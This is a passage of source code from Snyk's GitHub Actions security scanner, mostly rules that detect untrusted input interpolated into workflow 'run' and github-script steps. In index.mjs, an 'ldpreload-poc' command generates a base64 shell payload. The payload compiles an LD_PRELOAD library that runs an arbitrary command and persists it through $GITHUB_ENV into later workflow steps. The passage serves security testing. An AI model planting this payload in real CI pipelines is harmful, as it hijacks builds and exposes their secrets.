"ghi": "def", 264 | } 265 | }) 266 | ``` 267 | -------------------------------------------------------------------------------- /SECURITY.md: -------------------------------------------------------------------------------- 1 | # How to contact us 2 | 3 | Please send any issue that you feel affects the security of this module to 4 | **security@snyk.io**. 5 | 6 | # Expectations 7 | 8 | If you want to 9 | nudge us beyond the email to **security@snyk.io**, tell us you sent such an email (without the details) on another 10 | channel, such as: 11 | 12 | * A message [@snyksec](https://twitter.com/snyksec) on Twitter. 
13 | * A ticket at https://support.snyk.io/ 14 | -------------------------------------------------------------------------------- /catalog-info.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: backstage.io/v1alpha1 2 | kind: Component 3 | metadata: 4 | name: github-actions-scanner 5 | description: Github Actions Scanner 6 | annotations: 7 | github.com/project-slug: snyk/github-actions-scanner 8 | github.com/team-slug: snyk/security-labs 9 | backstage.io/techdocs-ref: dir:. 10 | labels: 11 | snyk.io/businessCriticality: high 12 | snyk.io/visibility: public 13 | snyk.io/metadata-version: "2022-23-01" 14 | spec: 15 | type: external-tooling 16 | lifecycle: "-" 17 | owner: security-labs 18 | -------------------------------------------------------------------------------- /index.mjs: -------------------------------------------------------------------------------- 1 | import dotenv from 'dotenv'; 2 | import { program, Option, InvalidArgumentError } from 'commander'; 3 | import { resolve } from 'node:path'; 4 | import { readFileSync } from 'fs'; 5 | import YAML from 'yaml'; 6 | 7 | import { OutputHandler } from './lib/outputHandler.mjs'; 8 | import { logger, GITHUB_URL_RE } from './lib/utils.mjs'; 9 | import { Cloner } from './lib/clone.mjs'; 10 | import { Scanner } from './lib/scanner.mjs'; 11 | import { Action, Repo, Org } from './lib/actions.mjs'; 12 | 13 | function validateUrl(url) { 14 | if (!url.match(GITHUB_URL_RE)) { 15 | throw new InvalidArgumentError("Invalid Github URL") 16 | } 17 | return url; 18 | } 19 | 20 | async function setup(_options) { 21 | const options = { ..._options.opts(), ..._options.parent.opts() }; 22 | dotenv.config({ path: resolve(options.env) }) 23 | const outputHandler = new OutputHandler(options); 24 | const scanner = await Scanner.new(options); 25 | 26 | return { 27 | options, 28 | outputHandler, 29 | scanner 30 | } 31 | } 32 | 33 | async function main() { 34 | 
logger.info("github-actions-scanner by Snyk (2024)"); 35 | program 36 | .description('Github Actions Scanner') 37 | .option('-e, --env ', '.env file path.', '.env') 38 | .option('-r, --recurse', 'Recurse into referenced actions') 39 | .addOption(new Option('-m, --max-depth ', 'Max Recursion Depth').default(5).argParser(parseInt).implies({ recurse: true })) 40 | .addOption(new Option('-s, --scan-rules ', 'Comma separated list of rules to use, by ID. Negate by prefixing with !').default('').argParser(arg => arg.split(","))) 41 | 42 | .option('--output ', 'Output file path.') 43 | .addOption(new Option('-f, --format ', 'Output format').choices(["json", "text"]).default("text")) 44 | 45 | program.command("list-rules") 46 | .description("List all available rules") 47 | .action(async ({ }, _options) => { 48 | const { options, outputHandler, scanner } = await setup(_options); 49 | for (const rule of scanner.rules) { 50 | console.log(rule.id); 51 | } 52 | }) 53 | 54 | program.command("scan-repo") 55 | .description("Scan a single repo") 56 | .requiredOption('-u, --url ', 'Github repository URL.', validateUrl) 57 | .action(async ({ url }, _options) => { 58 | const { options, outputHandler, scanner } = await setup(_options); 59 | const repo = await Repo.fromUrl(url); 60 | let findings = await repo.scan(options, scanner); 61 | logger.info(`Scanned ${scanner.scanned} actions`); 62 | outputHandler.reportFindings(findings); 63 | }) 64 | 65 | program.command("scan-org") 66 | .description("Scan all repos in an org") 67 | .requiredOption('-o, --org ', 'Github org name.') 68 | .action(async ({ org: orgname }, _options) => { 69 | const { options, outputHandler, scanner } = await setup(_options); 70 | let org = new Org(orgname); 71 | let findings = await org.scan(options, scanner); 72 | logger.info(`Scanned ${scanner.scanned} actions`); 73 | outputHandler.reportFindings(findings); 74 | }) 75 | 76 | program.command("scan-actions") 77 | .description("Scan a list of standalone actions 
from a file") 78 | .option('-a, --actions-yaml [actions-yaml-path]', 'Analyze actions from yaml.', "./github-action-repos.yml") 79 | .action(async ({ actionsYaml: actionsYamlFile }, _options) => { 80 | const { options, outputHandler, scanner } = await setup(_options); 81 | let actionsYaml; 82 | try { 83 | let actionsContent = await readFileSync(resolve(actionsYamlFile), { encoding: 'utf8' }); 84 | actionsYaml = YAML.parse(actionsContent); 85 | } catch (e) { 86 | logger.error(`Error parsing ${actionsYamlFile}: ${e.message}`) 87 | return 88 | } 89 | let actions = []; 90 | for (const url of actionsYaml?.repos) { 91 | const repo = await Action.fromUrl(url); 92 | if (repo) actions.push(repo) 93 | } 94 | 95 | let findings = []; 96 | for (const action of actions) { 97 | findings.push(...await action.scan(options, scanner)); 98 | } 99 | logger.info(`Scanned ${scanner.scanned} actions`); 100 | outputHandler.reportFindings(findings); 101 | }) 102 | 103 | program.command("clone") 104 | .description("Pseudo-fork a repo for testing") 105 | .requiredOption('-u, --url ', 'Github repository URL.') 106 | .action(async ({ url }, _options) => { 107 | await setup(_options); 108 | const clone = new Cloner(url); 109 | return clone.run(); 110 | }) 111 | 112 | program.command("ldpreload-poc") 113 | .description("Create a PoC to exploit subsequent steps after command injection with LD_PRELOAD") 114 | .requiredOption("-c, --command ", "Command to run from the LD_PRELOAD") 115 | .addOption(new Option("-b, --base64", "Encode the code for injection")) 116 | .action(({ command, base64 }, _options) => { 117 | const ldcode = Buffer.from(`#include 118 | void __attribute__((constructor)) so_main() { unsetenv("LD_PRELOAD"); system("${command.replace("\"", "\\\"")}"); } 119 | `) 120 | const code = Buffer.from(`echo ${ldcode.toString("base64")} | base64 -d | cc -fPIC -shared -xc - -o $GITHUB_WORKSPACE/ldpreload-poc.so; echo "LD_PRELOAD=$GITHUB_WORKSPACE/ldpreload-poc.so" >> $GITHUB_ENV`) 121 | 
console.log() 122 | console.log(code.toString(base64 ? "base64" : "ascii")); 123 | }); 124 | 125 | program.parse(); 126 | 127 | } 128 | 129 | await main(); 130 | -------------------------------------------------------------------------------- /lib/actions.mjs: -------------------------------------------------------------------------------- 1 | import { join } from 'node:path'; 2 | import { Octokit } from 'octokit'; 3 | import chalk from 'chalk'; 4 | import { logger, GITHUB_URL_RE, ACTION_NAME_REGEX, getFilesFromArchive, actionSteps, stepMatches, evaluateStepRule } from './utils.mjs'; 5 | import { SECRET_RULES } from "./rules/common/defs.mjs"; 6 | import YAML from 'yaml'; 7 | 8 | class Org { 9 | constructor(name) { 10 | this.name = name 11 | } 12 | async getRepos() { 13 | if (this._repos !== undefined) return this._repos 14 | const octokit = new Octokit({ auth: process.env?.GITHUB_TOKEN }); 15 | this._repos = []; 16 | try { 17 | for await (const response of octokit.paginate.iterator( 18 | octokit.rest.repos.listForOrg, 19 | { 20 | org: this.name, 21 | type: "public", 22 | per_page: 100, 23 | }, 24 | )) { 25 | for (const repoData of response.data) { 26 | if (repoData.archived || repoData.fork) continue; 27 | const repo = await Repo.fromUrl(repoData.html_url); 28 | if (repo) this._repos.push(repo) 29 | } 30 | }; 31 | } catch (e) { 32 | logger.warn(`Failed to list repos for org - ${this.name}: ${e.message}`); 33 | return; 34 | } 35 | 36 | return this._repos; 37 | } 38 | 39 | async scan(options, scanner) { 40 | const repos = await this.getRepos(); 41 | if (repos !== undefined) { 42 | logger.info(`Got ${chalk.green(repos.length)} repos in ${chalk.cyan(this.name)} to analyze.`) 43 | } 44 | let findings = []; 45 | for (const repo of await this.getRepos()) { 46 | findings.push(...await repo.scan(options, scanner)); 47 | } 48 | return findings; 49 | } 50 | } 51 | 52 | class RepoCache { 53 | static repos = [] 54 | static register(repo) { 55 | RepoCache.repos.push(repo) 56 | } 
57 | static find(owner, repo, ref) { 58 | for (const _repo of RepoCache.repos) { 59 | if ( 60 | _repo.owner == owner && 61 | _repo.repo == repo && 62 | _repo.ref == ref 63 | ) { 64 | logger.debug(`RepoCache HIT ${_repo.owner}/${_repo.repo}@${_repo.ref}`) 65 | return _repo 66 | } 67 | } 68 | } 69 | static async create(owner, repo, ref) { 70 | ref = ref === undefined ? "" : `/commit/${ref}` 71 | return await Repo.fromUrl(`https://github.com/${owner}/${repo}${ref}`) 72 | } 73 | static async findOrCreate(owner, repo, ref) { 74 | const found = RepoCache.find(owner, repo, ref) 75 | if (found !== undefined) return found; 76 | return await RepoCache.create(owner, repo, ref); 77 | } 78 | } 79 | 80 | class Repo { 81 | constructor(url, owner, repo, ref, defaultBranch, skip = false) { 82 | this.url = url; 83 | this.owner = owner; 84 | this.repo = repo; 85 | this.ref = ref || defaultBranch; 86 | this.skip = skip; 87 | 88 | RepoCache.register(this); 89 | } 90 | 91 | static async fromUrl(url) { 92 | let { groups: { owner, repo, ref } } = url.match(GITHUB_URL_RE); 93 | const octokit = new Octokit({ auth: process.env?.GITHUB_TOKEN }); 94 | 95 | let ret; 96 | try { 97 | ret = await octokit.rest.repos.get({ 98 | owner: owner, 99 | repo: repo 100 | }); 101 | } catch (e) { 102 | logger.warn(`Failed to get repo details for ${url}: ${e.message}`) 103 | return; 104 | } 105 | const { data: { default_branch: defaultBranch, size: repoSize, stargazers_count: stars } } = ret; 106 | let skip = repoSize > 1e6; 107 | if (repoSize > 1e6) { 108 | logger.info(`${chalk.cyan(url)} size = ${chalk.green(repoSize / 1000)} > 1GB, skipping.`); 109 | } 110 | 111 | return new Repo(url, owner, repo, ref, defaultBranch, skip); 112 | } 113 | 114 | async getActions() { 115 | if (this._actions !== undefined) return this._actions 116 | this._actions = []; 117 | const octokit = new Octokit({ auth: process.env?.GITHUB_TOKEN }); 118 | let ret; 119 | try { 120 | ret = await octokit.rest.repos.downloadTarballArchive({ 
owner: this.owner, repo: this.repo, ref: this.ref }); 121 | } catch (e) { 122 | logger.warn(`Failed to get tarball for ${this.owner}/${this.repo}: ${e.message}`) 123 | return this._actions; 124 | } 125 | const { url: redirectUrl } = ret; 126 | this._actionfiles = await getFilesFromArchive(redirectUrl); 127 | for (const filename of Object.keys(this._actionfiles)) { 128 | this._actions.push(await Action.fromRepoFile(this, filename)); 129 | } 130 | return this._actions; 131 | } 132 | 133 | async getFile(path) { 134 | if (this._actionfiles === undefined) await this.getActions(); 135 | let content = this._actionfiles?.[path]; 136 | return content; 137 | } 138 | 139 | async scan(options, scanner) { 140 | const actions = await this.getActions(); 141 | if (actions.length > 0) logger.info(`Got ${actions.length} actions for ${this.owner}/${this.repo}...`) 142 | let findings = []; 143 | for (const action of actions) { 144 | findings.push(...await action.scan(options, scanner)); 145 | } 146 | return findings; 147 | } 148 | 149 | // USED FOR REPORTING 150 | async triggeredBy(actionname) { 151 | let triggered = []; 152 | for (const action of await this.getActions()) { 153 | if ((await action.on())?.workflow_run?.workflows?.includes(actionname)) { 154 | triggered.push(action); 155 | } 156 | } 157 | return triggered; 158 | } 159 | // USED FOR REPORTING END 160 | } 161 | 162 | class ActionCache { 163 | static actions = [] 164 | static register(actions) { 165 | ActionCache.actions.push(actions) 166 | } 167 | static async findOrCreate(repo, path) { 168 | const found = ActionCache.find(repo, path) 169 | if (found !== undefined) return found; 170 | return await ActionCache.create(repo, path); 171 | } 172 | 173 | static find(repo, path) { 174 | for (const _action of ActionCache.actions) { 175 | if ( 176 | _action.repo !== undefined && 177 | _action.repo === repo && 178 | _action.subpath === path 179 | ) { 180 | logger.debug(`ActionCache HIT 
${repo.owner}/${repo.repo}/${path}@${repo.ref}`) 181 | return _action 182 | } 183 | } 184 | } 185 | static async create(repo, path) { 186 | return new Action(repo, path); 187 | } 188 | } 189 | 190 | const DEFAULT_ACTION_PERMISSIONS = { 191 | "restricted": { 192 | "contents": "read", 193 | "packages": "read", 194 | "metadata": "read", 195 | } 196 | } 197 | 198 | class Action { 199 | constructor(repo, subpath) { 200 | this.repo = repo; // type Repo 201 | this.subpath = subpath; 202 | this.scanned = false; 203 | this.usedby = []; 204 | 205 | ActionCache.register(this); 206 | } 207 | 208 | // USED FOR REPORTING 209 | get url() { 210 | if (this.repo !== undefined) { 211 | return `https://github.com/${this.repo.owner}/${this.repo.repo}/blob/${this.repo.ref}/${this.subpath}` 212 | } else { 213 | return `https://github.com/${this.norepo.org}/${this.norepo.action}/blob/${this.norepo.ref}/${this.subpath}` 214 | } 215 | } 216 | 217 | async permissionsForJob(job) { 218 | const config = await this.parsedContent(); 219 | if (!config) return []; 220 | 221 | let extras = {}; 222 | if (config.on?.hasOwnProperty("pull_request_target")) { 223 | extras["repository"] = "write"; 224 | } 225 | 226 | const joblevel = config.jobs?.[job]?.permissions; 227 | if (joblevel) return { ...joblevel, ...extras }; 228 | 229 | const toplevel = config.permissions; 230 | if (toplevel) return { ...toplevel, ...extras }; 231 | 232 | return DEFAULT_ACTION_PERMISSIONS.restricted; 233 | } 234 | 235 | async conditionsForJobStep(jobname, stepid) { 236 | const config = await this.parsedContent(); 237 | if (!config) return []; 238 | 239 | const job = config.jobs?.[jobname]; 240 | const action = config?.runs; 241 | if (!job && !action) return {}; 242 | const steps = job || action; 243 | const step = typeof stepid === "number" ? 
steps.steps[stepid] : steps.steps.filter(_step => _step.name == stepid)[0]; 244 | 245 | let conditionals = { 246 | "job": { 247 | "if": job?.if, 248 | "needs": job?.needs 249 | }, 250 | "step": { 251 | "if": step?.if 252 | } 253 | } 254 | 255 | return conditionals; 256 | } 257 | 258 | async stepsAfter(jobName, stepid) { 259 | const config = await this.parsedContent(); 260 | if (!config) return [0, []]; 261 | 262 | const steps = config.jobs?.[jobName]?.steps || config.runs?.steps; 263 | if (!steps) return [0, []]; 264 | 265 | let aftersteps = []; 266 | if (typeof stepid === "number") { 267 | aftersteps = steps.slice(stepid) 268 | } else { 269 | let add = false; 270 | for (const step of steps) { 271 | if (step.name == stepid) add = true; 272 | if (add) aftersteps.push(step); 273 | } 274 | } 275 | return [steps.length - aftersteps.length, aftersteps]; 276 | } 277 | 278 | async secretsAfter(jobName, stepid) { 279 | const config = await this.parsedContent(); 280 | if (!config) return []; 281 | 282 | let secrets = []; 283 | stepMatches(SECRET_RULES, config).forEach(rule => { 284 | secrets.push({ 285 | "src": "workflow", 286 | "with_secrets": evaluateStepRule(rule, config, { "with": { "*": "secret" } }).with, 287 | "env_secrets": evaluateStepRule(rule, config, { "with": { "*": "secret" } }).env 288 | }) 289 | }) 290 | 291 | for (const [secretkey, secretvalue] of Object.entries(config.jobs?.[jobName]?.secrets || {})) { 292 | secrets.push({ 293 | "src": "job", 294 | "key": secretkey, 295 | "value": secretvalue 296 | }) 297 | } 298 | 299 | const [stepoffset, subsequentsteps] = await this.stepsAfter(jobName, stepid); 300 | for (const [stepidx, step] of subsequentsteps.entries()) { 301 | const id = step.name || stepoffset + stepidx 302 | stepMatches(SECRET_RULES, step).forEach(rule => { 303 | secrets.push({ 304 | "src": "step", 305 | "step": id, 306 | "with_secrets": evaluateStepRule(rule, step, { "with": { "*": "secret" } }).with, 307 | "env_secrets": evaluateStepRule(rule, 
step, { "env": { "*": "secret" } }).env 308 | }) 309 | }) 310 | } 311 | 312 | return secrets; 313 | } 314 | 315 | async triggeredWorkflows() { 316 | const config = await this.parsedContent(); 317 | if (config === undefined) return; 318 | 319 | return this.repo?.triggeredBy(config.name) || [] 320 | } 321 | async on() { 322 | const config = await this.parsedContent(); 323 | 324 | return config?.on; 325 | } 326 | async runs_on(jobname) { 327 | const config = await this.parsedContent(); 328 | 329 | return config?.jobs?.[jobname]?.["runs-on"]; 330 | 331 | } 332 | // USED FOR REPORTING END 333 | 334 | static async fromUrl(url) { 335 | let { groups: { owner, repo, ref } } = url.match(GITHUB_URL_RE); 336 | const foundrepo = await RepoCache.findOrCreate(owner, repo, ref); 337 | if (!foundrepo) return; 338 | const action = await ActionCache.findOrCreate(foundrepo, "action.yml"); 339 | return action; 340 | } 341 | 342 | static async fromRepoFile(repo, file) { 343 | return await ActionCache.findOrCreate(repo, file); 344 | } 345 | 346 | static async fromUses(repo, uses) { 347 | if (uses.startsWith('.')) { 348 | // uses: ./ 349 | // relative to root of repo 350 | const path = join(uses, "action.yml"); 351 | return await ActionCache.findOrCreate(repo, path); 352 | } else if (uses.startsWith("docker://")) { 353 | // docker hub 354 | logger.warn("uses: docker:// detected but not supported") 355 | } else { 356 | // uses: actions/checkout@v4 357 | let { groups: { org, action, subPath, ref } } = uses.match(ACTION_NAME_REGEX) 358 | if (subPath === undefined) subPath = ""; 359 | if (ref === undefined) ref = ""; 360 | const repo = await RepoCache.findOrCreate(org, action, ref); 361 | const newaction = await ActionCache.findOrCreate(repo, join(subPath, "action.yml")); 362 | if (newaction.repo === undefined) { 363 | newaction.norepo = { 364 | uses, 365 | org, 366 | action, 367 | subPath, 368 | ref 369 | } 370 | } 371 | return newaction; 372 | } 373 | } 374 | 375 | get name() { 376 | if 
(this.repo === undefined) { 377 | return this.norepo?.uses; 378 | } else { 379 | return `${this.repo.owner}/${this.repo.repo}/${this.subpath}@${this.repo.ref}`; 380 | } 381 | } 382 | 383 | async getFileContent() { 384 | if (this._contents !== undefined) return this._contents 385 | this._contents = this.repo?.getFile(this.subpath) || ""; 386 | return this._contents; 387 | } 388 | 389 | async parsedContent() { 390 | if (this._actionContent !== undefined) return this._actionContent; 391 | this._actionContent = {}; 392 | try { 393 | this._actionContent = YAML.parse(await this.getFileContent()); 394 | } catch (error) { 395 | logger.error(`parsedContent: Error parsing YAML content for ${this.name}: ${error.message}`); 396 | } 397 | return this._actionContent; 398 | } 399 | 400 | async getAllRecursiveActions() { 401 | if (this._uses !== undefined) return this._uses; 402 | 403 | this._uses = []; 404 | const uses = await this.getAllUses(); 405 | for (const [step, usedby] of uses) { 406 | const action = await Action.fromUses(this.repo, step.uses) 407 | action.usedby.push(usedby) 408 | this._uses.push(action) 409 | } 410 | return this._uses; 411 | } 412 | 413 | async getAllUses() { 414 | const contents = await this.getFileContent(); 415 | if (contents === undefined) return []; 416 | let yamlContent; 417 | try { 418 | yamlContent = YAML.parse(contents); 419 | } catch (error) { 420 | logger.error(`getAllUses: Error parsing YAML content for ${this.name}: ${error.message}`); 421 | return this._uses; 422 | } 423 | 424 | let subactions = []; 425 | for (const [jobKey, job, step, stepidx] of actionSteps(yamlContent)) { 426 | if (step?.uses !== undefined) { 427 | subactions.push([step, { 428 | url: this.url, 429 | job: jobKey, 430 | step: step.name || stepidx, 431 | with: step.with 432 | }]) 433 | } 434 | } 435 | 436 | return subactions; 437 | } 438 | 439 | async scan(options, scanner, maxDepth = undefined) { 440 | if (this.skip) { 441 | logger.debug(`Skipping 
${this.repo.owner}/${this.repo.repo}/${this.subpath}@${this.repo.ref}`) 442 | return []; 443 | } 444 | if (this.scanned) { 445 | logger.debug(`Already scanned ${this.repo.owner}/${this.repo.repo}/${this.subpath}@${this.repo.ref}. Skipping`) 446 | return []; 447 | }; 448 | this.scanned = true; 449 | 450 | logger.info(`Scanning ${this.name}...`) 451 | 452 | let findings = []; 453 | findings.push(...await scanner.scanAction(this)); 454 | 455 | if (options.recurse) { 456 | maxDepth = maxDepth === undefined ? options.maxDepth : maxDepth - 1; 457 | const subactions = await this.getAllRecursiveActions(); 458 | for (const action of subactions) { 459 | findings.push(...await action.scan(options, scanner, maxDepth)); 460 | } 461 | } 462 | return findings; 463 | } 464 | } 465 | 466 | export { Org, Repo, Action }; 467 | -------------------------------------------------------------------------------- /lib/clone.mjs: -------------------------------------------------------------------------------- 1 | import chalk from 'chalk'; 2 | import { Octokit } from 'octokit'; 3 | import { logger, GITHUB_URL_RE } from './utils.mjs'; 4 | import { spawnSync } from 'child_process'; 5 | import { mkdtempSync, rmSync } from 'fs'; 6 | import { tmpdir } from 'os'; 7 | import { join } from 'node:path'; 8 | 9 | class Git { 10 | constructor(directory) { 11 | this.directory = mkdtempSync(join(tmpdir(), 'gha-scanner-')); 12 | this.stdio = logger.level === "debug" ? 
"inherit" : "pipe"; 13 | } 14 | clone(repo) { 15 | spawnSync("git", [ 16 | "clone", 17 | repo, 18 | this.directory 19 | ], { 20 | shell: false, 21 | stdio: this.stdio 22 | }) 23 | } 24 | 25 | setOrigin(origin) { 26 | spawnSync("git", [ 27 | "-C", 28 | this.directory, 29 | "remote", 30 | "set-url", 31 | "origin", 32 | origin 33 | ], { 34 | shell: false, 35 | stdio: this.stdio 36 | }) 37 | } 38 | 39 | push() { 40 | spawnSync("git", [ 41 | "-C", 42 | this.directory, 43 | "push", 44 | "--all", 45 | "origin", 46 | ], { 47 | shell: false, 48 | stdio: this.stdio 49 | }) 50 | } 51 | 52 | cleanup() { 53 | rmSync(this.directory, { recursive: true, force: true }); 54 | } 55 | 56 | } 57 | 58 | class Cloner { 59 | constructor(repo) { 60 | let { groups: { 61 | owner: sourceowner, 62 | repo: sourcerepo 63 | } } = repo.match(GITHUB_URL_RE); 64 | this.sourceowner = sourceowner; 65 | this.sourcerepo = sourcerepo; 66 | 67 | if (process.env.GITHUB_TOKEN === undefined) { 68 | throw new Error("GITHUB_TOKEN not defined"); 69 | } 70 | } 71 | 72 | async login() { 73 | this.octokit = new Octokit({ auth: process.env?.GITHUB_TOKEN }); 74 | const { 75 | data: { login }, 76 | } = await this.octokit.rest.users.getAuthenticated(); 77 | this.username = login; 78 | } 79 | 80 | async createRepo() { 81 | logger.debug(`[DEBUG] Creating new repo ${chalk.green(this.username)}/${chalk.yellow(this.sourcerepo)}`); 82 | try { 83 | await this.octokit.request('POST /user/repos', { 84 | name: this.sourcerepo, 85 | description: `Clone of ${this.sourceowner}/${this.sourcerepo}`, 86 | homepage: 'https://github.com', 87 | 'private': true, 88 | headers: { 89 | 'X-GitHub-Api-Version': '2022-11-28' 90 | } 91 | }) 92 | } catch (err) { 93 | logger.error(`${err.response?.data?.message} : ${JSON.stringify(err.response?.data?.errors)}`); 94 | process.exit(1); 95 | } 96 | } 97 | 98 | cloneAndPush() { 99 | let G = new Git() 100 | logger.debug(`Cloning from ${chalk.cyan(this.sourceowner)}/${chalk.yellow(this.sourcerepo)}`); 
101 | G.clone(`https://github.com/${this.sourceowner}/${this.sourcerepo}`) 102 | G.setOrigin(`https://${this.username}:${process.env.GITHUB_TOKEN}@github.com/${this.username}/${this.sourcerepo}`) 103 | logger.debug(`Pushing to ${chalk.green(this.username)}/${chalk.yellow(this.sourcerepo)}`); 104 | G.push() 105 | logger.debug(`Cleaning up ${G.directory}`); 106 | G.cleanup(); 107 | } 108 | 109 | async run() { 110 | await this.login(); 111 | logger.info(`Cloning ${chalk.cyan(this.sourceowner)}/${chalk.yellow(this.sourcerepo)} to ${chalk.green(this.username)}/${chalk.yellow(this.sourcerepo)}`); 112 | 113 | await this.createRepo(); 114 | this.cloneAndPush(); 115 | logger.info(`Repo cloned to https://github.com/${this.username}/${this.sourcerepo}`); 116 | } 117 | } 118 | export { Cloner, /* for testing */ Git }; 119 | -------------------------------------------------------------------------------- /lib/outputHandler.mjs: -------------------------------------------------------------------------------- 1 | import { writeFileSync } from 'fs'; 2 | import { logger } from './utils.mjs'; 3 | 4 | function groupBy(array, key) { 5 | let ret = {}; 6 | for (const item of array) { 7 | if (!ret.hasOwnProperty(key(item))) ret[key(item)] = []; 8 | ret[key(item)].push(item); 9 | } 10 | return ret; 11 | } 12 | 13 | class OutputHandler { 14 | constructor(options) { 15 | this.options = options; 16 | } 17 | 18 | toFile(content) { 19 | try { 20 | writeFileSync( 21 | this.options.output, 22 | content 23 | ) 24 | } catch (e) { 25 | logger.warn(`Failed writing to ${this.options.output}: ${e.message}`); 26 | } 27 | } 28 | 29 | toConsole(content) { 30 | console.log(content) 31 | } 32 | 33 | async reportFindingsJSON(findings) { 34 | let formatted = []; 35 | for (const finding of findings) { 36 | await finding.prereport(); 37 | formatted.push(await finding.toJSON()) 38 | } 39 | 40 | return JSON.stringify(formatted, null, 2); 41 | } 42 | 43 | async reportFindingsText(findings) { 44 | let formatted = 
[]; 45 | for (const finding of findings) { 46 | await finding.prereport(); 47 | formatted.push(await finding.forText()) 48 | } 49 | 50 | let text = ""; 51 | for (const [k, repo] of Object.entries(groupBy(formatted, obj => [obj.rule, obj.repo]))) { 52 | text += `The rule ${repo[0].rule} triggered for ${repo[0].repo}\n` 53 | text += ` Documentation: ${repo[0].documentation}\n` 54 | for (const [k, subpath] of Object.entries(groupBy(repo, obj => obj.subpath))) { 55 | text += ` Workflow: ${subpath[0].subpath}\n` 56 | for (const [k, job] of Object.entries(groupBy(subpath, obj => obj.job))) { 57 | text += ` Job: ${job[0].job}\n`; 58 | for (const [k, step] of Object.entries(groupBy(job, obj => obj.step))) { 59 | text += ` Step: ${step[0].step}\n`; 60 | for (const finding of step) { 61 | text += ` - Description: ${finding.description}\n`; 62 | text += ` Permissions: ${finding.permissions}\n`; 63 | text += ` Secrets: ${finding.secrets}\n`; 64 | text += "\n"; 65 | } 66 | } 67 | } 68 | } 69 | } 70 | 71 | return text 72 | } 73 | 74 | async reportFindings(findings) { 75 | let formatted; 76 | switch (this.options.format) { 77 | case "json": 78 | formatted = await this.reportFindingsJSON(findings); 79 | break; 80 | default: 81 | case "text": 82 | formatted = await this.reportFindingsText(findings); 83 | break; 84 | } 85 | 86 | switch (this.options.output) { 87 | case undefined: 88 | this.toConsole(formatted); 89 | break; 90 | default: 91 | this.toFile(formatted); 92 | break; 93 | } 94 | } 95 | } 96 | 97 | export { OutputHandler }; 98 | -------------------------------------------------------------------------------- /lib/rules/cmd_exec.mjs: -------------------------------------------------------------------------------- 1 | import { UNTRUSTED_INPUT } from './common/defs.mjs'; 2 | import { Finding } from "./common/finding.mjs"; 3 | import { actionSteps, stepMatches, evaluateStepRule } from '../utils.mjs'; 4 | 5 | const UNTRUSTED_INPUT_RULES = UNTRUSTED_INPUT.map(input => { 6 | 
return { 7 | run: new RegExp(`^(?.*[$]{{[^}]*?(?${input.source}).*?}}.*)$`, "mg") 8 | } 9 | }) 10 | 11 | class CmdExec { 12 | static id = "CMD_EXEC" 13 | static documentation = "https://github.com/snyk/github-actions-scanner#CMD_EXEC" 14 | 15 | static async description(finding) { 16 | return `Run line ${finding.details.run_lineno} in the identified step unsafely interpolates ${finding.details.value} into a 'run' directive, which may result in arbitrary command execution` 17 | } 18 | 19 | static async prereport(finding) { 20 | if (finding.details.value.startsWith("inputs.")) { 21 | const key = finding.details.value.slice("inputs.".length); 22 | const set_by = finding.action.usedby.filter(step => step.with?.[key]).map(step => { 23 | return { 24 | ...step, 25 | with: { [key]: step.with[key] } 26 | } 27 | }) 28 | if (set_by.length) { 29 | finding.details.set_in = set_by 30 | } 31 | } 32 | } 33 | 34 | static async scan(action) { 35 | const yamlContent = await action.parsedContent(); 36 | let findings = []; 37 | for (const [jobKey, job, step, stepidx] of actionSteps(yamlContent)) { 38 | stepMatches(UNTRUSTED_INPUT_RULES, step).forEach( 39 | rule => { 40 | const lines = evaluateStepRule(rule, step, { run: "line" }); 41 | const { run: srcs } = evaluateStepRule(rule, step, { run: "src" }); 42 | for (const [idx, line] of lines.run.entries()) { 43 | findings.push(new Finding( 44 | CmdExec, 45 | action, 46 | jobKey, 47 | step.name || stepidx, 48 | { 49 | "run_lineno": step.run.split("\n").indexOf(line), 50 | "line": line, 51 | "value": srcs[idx] 52 | } 53 | )) 54 | 55 | } 56 | } 57 | ) 58 | 59 | } 60 | return findings; 61 | } 62 | } 63 | export { CmdExec as default } 64 | -------------------------------------------------------------------------------- /lib/rules/code_injection.mjs: -------------------------------------------------------------------------------- 1 | import { UNTRUSTED_INPUT } from './common/defs.mjs'; 2 | import { Finding } from "./common/finding.mjs"; 3 | 
import { actionSteps, stepMatches, evaluateStepRule } from '../utils.mjs';

// Rules matching actions/github-script steps whose `script:` input
// interpolates a known untrusted expression via ${{ ... }}. Named groups are
// consumed by evaluateStepRule(): `line` = the offending script line,
// `src` = the untrusted expression. (Group names restored: the extracted
// source had `(?...)`, which is an invalid group in JS RegExp.)
const CODE_INJECT_RULE = UNTRUSTED_INPUT.map(input => {
  return {
    uses: new RegExp("actions/github-script"),
    with: { script: new RegExp(`^(?<line>.*[$]{{[^}]*?(?<src>${input.source}).*?}}.*)$`, "mg") }
  }
});

/**
 * Rule: flags actions/github-script steps that interpolate
 * attacker-controllable expressions into the executed JavaScript.
 */
class CodeInject {
  static id = "CODE_INJECT"
  static documentation = "https://github.com/snyk/github-actions-scanner#CODE_INJECT"

  /** Human-readable description for a single finding. */
  static async description(finding) {
    return `Run line ${finding.details.run_lineno} in the identified step unsafely interpolates ${finding.details.value} into actions/github-script 'script' directive, which may result in arbitrary code execution`
  }

  /**
   * Pre-report enrichment: when the injected value is an action input
   * (`inputs.<key>`), record which caller steps actually set that key.
   */
  static async prereport(finding) {
    if (finding.details.value.startsWith("inputs.")) {
      const key = finding.details.value.slice("inputs.".length);
      const set_by = finding.action.usedby.filter(step => step.with?.[key]).map(step => {
        return {
          ...step,
          // Narrow `with` down to just the key of interest.
          with: { [key]: step.with[key] }
        }
      })
      if (set_by.length) {
        finding.details.set_in = set_by
      }
    }
  }

  /** Scans every step for unsafe interpolation into github-script's `script:`. */
  static async scan(action) {
    const yamlContent = await action.parsedContent();
    let findings = [];
    for (const [jobKey, job, step, stepidx] of actionSteps(yamlContent)) {
      stepMatches(CODE_INJECT_RULE, step).forEach(
        rule => {
          const { with: { script: lines } } = evaluateStepRule(rule, step, { with: { script: "line" } });
          const { with: { script: srcs } } = evaluateStepRule(rule, step, { with: { script: "src" } });
          // (leftover debug `console.log(step)` removed)
          for (const [idx, line] of lines.entries()) {
            findings.push(new Finding(
              CodeInject,
              action,
              jobKey,
              step.name || stepidx,
              {
                // NOTE(review): indexOf() reports the first occurrence, so
                // duplicate script lines share one (0-based) line number.
                "run_lineno": step.with.script.split("\n").indexOf(line),
                "line": line,
                "value": srcs[idx]
              }
            ))
          }
        }
      )
    }
    return findings;
  }
}
export { CodeInject as default }

// -------------------------------------------------------------
// lib/rules/common/defs.mjs

